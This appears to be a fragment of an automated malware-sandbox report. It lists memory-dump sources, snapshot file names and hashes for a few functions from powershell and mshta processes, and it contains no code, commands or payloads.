                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 87i
                                                                                                • API String ID: 0-2029458087
                                                                                                • Opcode ID: b7a3aae232dce9f2f8c7d4126e4f8909e618b46f0d6e5a9ad2b49f4b46aaaa25
                                                                                                • Instruction ID: 5e13f6fe522bb076fe87e71325646a57622139daf4ce0a560ec16909dcc1264a
                                                                                                • Opcode Fuzzy Hash: b7a3aae232dce9f2f8c7d4126e4f8909e618b46f0d6e5a9ad2b49f4b46aaaa25
                                                                                                • Instruction Fuzzy Hash: D521141190E7C54FE747933828652A1BFB2AF57214B5E00DBD489CF1B3E40D4EAAC362

                                                                                                Executed Functions

                                                                                                Function 029D0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000003.469826327.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_3_29d0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Function 029D0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000003.469826327.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_3_29d0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Function 029D0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000003.469826327.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_3_29d0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction Fuzzy Hash: